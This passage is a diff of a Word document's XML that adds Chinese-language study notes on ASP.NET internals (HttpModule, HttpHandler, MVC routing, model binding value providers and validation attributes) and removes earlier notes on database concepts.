+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>以下一些就是典型的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTPModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>基础功能：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>OutputCacheModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>：实现了输出缓存功能</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>SessionStateModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>：在无状态的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>协议上实现了基于会话（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Session</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>）的状态保存。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>WindowsAuthentication + FormsAuthentication + PassportAuthentication Module</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>：实现了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Forms</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Passport</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>这三种典型的身份认证方式。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HttpHandler</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>对于不同资源的请求，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>会加载不同的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Handler</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>来处理，比如</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>aspx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>页面</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>（实现了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>IHttpHandler</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="NSimSun" w:eastAsia="宋体" w:hAnsi="NSimSun" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>接口</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>asmx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>服务</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>WebServiceHandler</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>对应的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Handler</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>是不同的。所有的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HttpHandler</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>都实现了具有如下定义的接口</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.Web.IHttpHandler</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，定义了其中的方法</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ProcessRequest</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>提供了处理请求的实现。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Routing路由</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>对于传统的ASP.NET WebForms应用来说，用户请求总是指向某个具体的物理文件，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>目标文件的路径决定了访问请求的URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>。但是对于ASP.NET MVC应用来说，来自浏览器的请求总是来自某个Controller中的某个Action，请求URL与目标Controller/Action之间的映射是通过“路由”来实现的。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
         </w:numPr>
         <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>数据库服务端、客户端、图形界面管理工具、数据库语言（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>PL-sql,T-sql,sql</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>）、数据库安全等概念</w:t>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="02696D"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Binding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>模型绑定</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>new ChildActionValueProviderFactory(),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>new FormValueProviderFactory(),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>new JsonValueProviderFactory(),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>new RouteDataValueProviderFactory(),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>new QueryStringValueProviderFactory(),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>new HttpFileCollectionValueProviderFactory()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>...</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11843,19 +12065,891 @@
         <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
+          <w:numId w:val="18"/>
         </w:numPr>
         <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>视图、存储过程、游标、中间表、触发器、计划任务等常用技术</w:t>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="02696D"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>AOP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>面向切面（常用特性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(Attribute)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>及自定义特性）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>元数据</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>验证基类</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.ValidationAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>System.ComponentModel.DataAnnotations.CompareAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:ind w:left="1350"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
